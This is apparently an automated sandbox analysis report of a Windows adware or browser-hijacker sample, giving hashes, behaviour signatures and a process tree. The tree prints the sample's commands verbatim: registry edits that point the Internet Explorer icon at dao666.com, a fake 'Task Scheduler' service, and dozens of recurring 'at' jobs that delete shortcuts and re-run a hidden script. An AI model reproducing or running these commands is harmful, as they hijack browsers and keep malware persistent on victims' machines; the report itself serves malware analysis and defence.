Analysis

  • max time kernel
    147s
  • max time network
    144s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03/11/2024, 08:38

General

  • Target

    8a903fdc2c88d4b47405519f174877cd_JaffaCakes118.exe

  • Size

    444KB

  • MD5

    8a903fdc2c88d4b47405519f174877cd

  • SHA1

    e9d2e4265d7c9623cb5b5c309cac128eaac78297

  • SHA256

    585096007cf202b245bd6b1e891142e4d2603addbd09e23b2fec98487ccd7fcd

  • SHA512

    75f558c37595039c36920c1b35a5581bfea3a55553680d1a8b79449405b33edf06a4a522465de6baa982c24045712c1744cfbc057ea86ba811452cc647190ea3

  • SSDEEP

    12288:wutrzh9xOXk7GMHOJxl/0z+uoqzBTQGtem:wutr5OUStD/0zpJ7

Malware Config

Signatures

  • Creates new service(s) 2 TTPs
  • Sets file to hidden 1 TTPs 6 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 3 IoCs
  • Drops file in Program Files directory 21 IoCs
  • Drops file in Windows directory 4 IoCs
  • Launches sc.exe 2 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Service Discovery 1 TTPs 3 IoCs

    Adversaries may try to gather information about registered local system services.

  • Modifies Internet Explorer settings 1 TTPs 37 IoCs
  • Modifies registry class 45 IoCs
  • Runs net.exe
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 6 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\8a903fdc2c88d4b47405519f174877cd_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\8a903fdc2c88d4b47405519f174877cd_JaffaCakes118.exe"
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:2988
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install_7xdown.vbs"
      2⤵
      • Checks computer location settings
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4912
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C start /min iexplore http://dao666.com/index2.html?7xdown
        3⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:4312
        • C:\Program Files\Internet Explorer\iexplore.exe
          "C:\Program Files\Internet Explorer\iexplore.exe" http://dao666.com/index2.html?7xdown
          4⤵
          • Modifies Internet Explorer settings
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:968
          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:968 CREDAT:17410 /prefetch:2
            5⤵
            • System Location Discovery: System Language Discovery
            • Modifies Internet Explorer settings
            • Suspicious use of SetWindowsHookEx
            PID:4448
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C .\tool.cmd
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3232
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
          4⤵
          • System Location Discovery: System Language Discovery
          • Modifies registry class
          PID:1068
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}" /v "InfoTip" /t REG_SZ /d "▓Θ╒╥▓ó╧╘╩╛ Internet ╔╧╡─╨┼╧ó║══°╒╛" /f
          4⤵
          • Modifies registry class
          PID:4684
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}" /v "LocalizedString" /t REG_SZ /d "Internet Exploror" /f
          4⤵
          • Modifies registry class
          PID:1348
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon"
          4⤵
          • System Location Discovery: System Language Discovery
          • Modifies registry class
          PID:1888
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon" /ve /t REG_EXPAND_SZ /d "shdoclc.dll,0" /f
          4⤵
          • System Location Discovery: System Language Discovery
          • Modifies registry class
          PID:3512
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32"
          4⤵
          • System Location Discovery: System Language Discovery
          • Modifies registry class
          PID:3476
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32" /ve /t REG_SZ /d "%systemRoot%\system32\shdocvw.dll" /f
          4⤵
          • System Location Discovery: System Language Discovery
          • Modifies registry class
          PID:4828
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32" /v "ThreadingModel" /t REG_SZ /d "Apartment" /f
          4⤵
          • System Location Discovery: System Language Discovery
          • Modifies registry class
          PID:448
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell"
          4⤵
          • Modifies registry class
          PID:884
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell" /ve /t REG_SZ /d "┤≥┐¬╓≈╥│(&H)" /f
          4⤵
          • Modifies registry class
          PID:4588
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)"
          4⤵
          • System Location Discovery: System Language Discovery
          • Modifies registry class
          PID:4072
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)" /v "MUIVerb" /t REG_SZ /d "@shdoclc.dll,-10241" /f
          4⤵
          • System Location Discovery: System Language Discovery
          • Modifies registry class
          PID:3676
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command"
          4⤵
          • System Location Discovery: System Language Discovery
          • Modifies registry class
          PID:4344
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command" /ve /t REG_SZ /d "C:\progra~1\Intern~1\iexplore.exe http://www.dao666.com/?in" /f
          4⤵
          • System Location Discovery: System Language Discovery
          • Modifies registry class
          PID:3588
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)"
          4⤵
          • Modifies registry class
          PID:628
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command"
          4⤵
          • System Location Discovery: System Language Discovery
          • Modifies registry class
          PID:396
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command" /ve /t REG_SZ /d "C:\progra~1\Intern~1\iexplore.exe http://www.dao666.com/?in" /f
          4⤵
          • Modifies registry class
          PID:3224
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder"
          4⤵
          • System Location Discovery: System Language Discovery
          • Modifies registry class
          PID:3444
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder" /v "Attributes" /t REG_DWORD /d 0 /f
          4⤵
          • System Location Discovery: System Language Discovery
          • Modifies registry class
          PID:5092
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder" /v "HideFolderVerbs" /t REG_SZ /d "" /f
          4⤵
          • Modifies registry class
          PID:1688
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder" /v "HideOnDesktopPerUser" /t REG_SZ /d "" /f
          4⤵
          • System Location Discovery: System Language Discovery
          • Modifies registry class
          PID:808
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder" /v "WantsParsDisplayName" /t REG_SZ /d "" /f
          4⤵
          • Modifies registry class
          PID:4816
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoInternetIcon" /t REG_DWORD /d 1 /f
          4⤵
          • System Location Discovery: System Language Discovery
          PID:3164
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C .\runonce.cmd
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1648
        • C:\Windows\SysWOW64\sc.exe
          sc create Schedule binpath= "C:\Windows\svchost.exe -k netsvcs" depend= rpcss start= auto displayname= "Task Scheduler"
          4⤵
          • Launches sc.exe
          • System Location Discovery: System Language Discovery
          • System Service Discovery
          PID:3584
        • C:\Windows\SysWOW64\sc.exe
          sc config Schedule start= auto
          4⤵
          • Launches sc.exe
          • System Location Discovery: System Language Discovery
          PID:3692
        • C:\Windows\SysWOW64\net.exe
          net start "Task Scheduler"
          4⤵
          • System Service Discovery
          PID:3216
          • C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 start "Task Scheduler"
            5⤵
            • System Location Discovery: System Language Discovery
            • System Service Discovery
            PID:1508
        • C:\Windows\SysWOW64\at.exe
          at 8:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:5076
        • C:\Windows\SysWOW64\at.exe
          at 8:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
          4⤵
            PID:1796
          • C:\Windows\SysWOW64\at.exe
            at 8:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
            4⤵
              PID:1040
            • C:\Windows\SysWOW64\at.exe
              at 9:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
              4⤵
              • System Location Discovery: System Language Discovery
              PID:4868
            • C:\Windows\SysWOW64\at.exe
              at 9:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
              4⤵
              • System Location Discovery: System Language Discovery
              PID:3148
            • C:\Windows\SysWOW64\at.exe
              at 9:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
              4⤵
                PID:2608
              • C:\Windows\SysWOW64\at.exe
                at 10:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
                4⤵
                  PID:1684
                • C:\Windows\SysWOW64\at.exe
                  at 10:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
                  4⤵
                  • System Location Discovery: System Language Discovery
                  PID:2692
                • C:\Windows\SysWOW64\at.exe
                  at 10:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
                  4⤵
                    PID:4332
                  • C:\Windows\SysWOW64\at.exe
                    at 11:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
                    4⤵
                      PID:4308
                    • C:\Windows\SysWOW64\at.exe
                      at 11:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
                      4⤵
                      • System Location Discovery: System Language Discovery
                      PID:4696
                    • C:\Windows\SysWOW64\at.exe
                      at 11:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
                      4⤵
                      • System Location Discovery: System Language Discovery
                      PID:3712
                    • C:\Windows\SysWOW64\at.exe
                      at 12:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
                      4⤵
                        PID:2668
                      • C:\Windows\SysWOW64\at.exe
                        at 12:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
                        4⤵
                          PID:724
                        • C:\Windows\SysWOW64\at.exe
                          at 12:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
                          4⤵
                            PID:2068
                          • C:\Windows\SysWOW64\at.exe
                            at 13:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
                            4⤵
                              PID:4976
                            • C:\Windows\SysWOW64\at.exe
                              at 13:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
                              4⤵
                                PID:1336
                              • C:\Windows\SysWOW64\at.exe
                                at 13:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
                                4⤵
                                  PID:2828
                                • C:\Windows\SysWOW64\at.exe
                                  at 14:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
                                  4⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:4964
                                • C:\Windows\SysWOW64\at.exe
                                  at 14:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
                                  4⤵
                                    PID:3436
                                  • C:\Windows\SysWOW64\at.exe
                                    at 14:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
                                    4⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:2724
                                  • C:\Windows\SysWOW64\at.exe
                                    at 15:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
                                    4⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:4780
                                  • C:\Windows\SysWOW64\at.exe
                                    at 15:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
                                    4⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:3044
                                  • C:\Windows\SysWOW64\at.exe
                                    at 15:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
                                    4⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:1380
                                  • C:\Windows\SysWOW64\at.exe
                                    at 16:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
                                    4⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:4792
                                  • C:\Windows\SysWOW64\at.exe
                                    at 16:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
                                    4⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:672
                                  • C:\Windows\SysWOW64\at.exe
                                    at 16:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
                                    4⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:3696
                                  • C:\Windows\SysWOW64\at.exe
                                    at 17:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
                                    4⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:4392
                                  • C:\Windows\SysWOW64\at.exe
                                    at 17:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
                                    4⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:456
                                  • C:\Windows\SysWOW64\at.exe
                                    at 17:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
                                    4⤵
                                      PID:4772
                                    • C:\Windows\SysWOW64\at.exe
                                      at 18:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:2356
                                    • C:\Windows\SysWOW64\at.exe
                                      at 18:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
                                      4⤵
                                        PID:936
                                      • C:\Windows\SysWOW64\at.exe
                                        at 18:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
                                        4⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:924
                                      • C:\Windows\SysWOW64\at.exe
                                        at 19:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
                                        4⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:3496
                                      • C:\Windows\SysWOW64\at.exe
                                        at 19:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
                                        4⤵
                                          PID:2496
                                        • C:\Windows\SysWOW64\at.exe
                                          at 19:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
                                          4⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:3208
                                        • C:\Windows\SysWOW64\at.exe
                                          at 20:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
                                          4⤵
                                            PID:2180
                                          • C:\Windows\SysWOW64\at.exe
                                            at 20:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
                                            4⤵
                                              PID:3924
                                            • C:\Windows\SysWOW64\at.exe
                                              at 20:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
                                              4⤵
                                                PID:3500
                                              • C:\Windows\SysWOW64\at.exe
                                                at 21:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
                                                4⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:5092
                                              • C:\Windows\SysWOW64\at.exe
                                                at 21:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
                                                4⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:1688
                                              • C:\Windows\SysWOW64\at.exe
                                                at 21:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
                                                4⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:4764
                                              • C:\Windows\SysWOW64\at.exe
                                                at 22:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
                                                4⤵
                                                  PID:1984
                                                • C:\Windows\SysWOW64\at.exe
                                                  at 22:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
                                                  4⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:3916
                                                • C:\Windows\SysWOW64\at.exe
                                                  at 22:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
                                                  4⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:4568
                                                • C:\Windows\SysWOW64\at.exe
                                                  at 23:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
                                                  4⤵
                                                    PID:3232
                                                  • C:\Windows\SysWOW64\at.exe
                                                    at 23:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
                                                    4⤵
                                                      PID:2680
                                                    • C:\Windows\SysWOW64\at.exe
                                                      at 23:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
                                                      4⤵
                                                        PID:1344
                                                      • C:\Windows\SysWOW64\at.exe
                                                        at 00:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explore*.*"
                                                        4⤵
                                                        • System Location Discovery: System Language Discovery
                                                        PID:1200
                                                      • C:\Windows\SysWOW64\at.exe
                                                        at 00:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explore*.*"
                                                        4⤵
                                                          PID:1892
                                                        • C:\Windows\SysWOW64\at.exe
                                                          at 00:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
                                                          4⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:1508
                                                        • C:\Windows\SysWOW64\at.exe
                                                          at 10:33 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Σ»└└*.*"
                                                          4⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:4600
                                                        • C:\Windows\SysWOW64\at.exe
                                                          at 10:34 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Σ»└└*.*"
                                                          4⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:4364
                                                        • C:\Windows\SysWOW64\at.exe
                                                          at 10:35 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday C:\WINDOWS\mail\UltraEdit\is.cmd
                                                          4⤵
                                                            PID:1572
                                                          • C:\Windows\SysWOW64\at.exe
                                                            at 10:36 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Documents and Settings\All Users\╫└├µ\*Σ»└└*.*"
                                                            4⤵
                                                            • System Location Discovery: System Language Discovery
                                                            PID:2748
                                                          • C:\Windows\SysWOW64\at.exe
                                                            at 14:33 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Σ»└└*.*"
                                                            4⤵
                                                              PID:4012
                                                            • C:\Windows\SysWOW64\at.exe
                                                              at 14:34 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Σ»*.*"
                                                              4⤵
                                                                PID:3380
                                                              • C:\Windows\SysWOW64\at.exe
                                                                at 14:35 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday C:\WINDOWS\mail\UltraEdit\is.cmd
                                                                4⤵
                                                                • System Location Discovery: System Language Discovery
                                                                PID:1256
                                                              • C:\Windows\SysWOW64\at.exe
                                                                at 14:36 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Documents and Settings\All Users\╫└├µ\*Σ»└└*.*"
                                                                4⤵
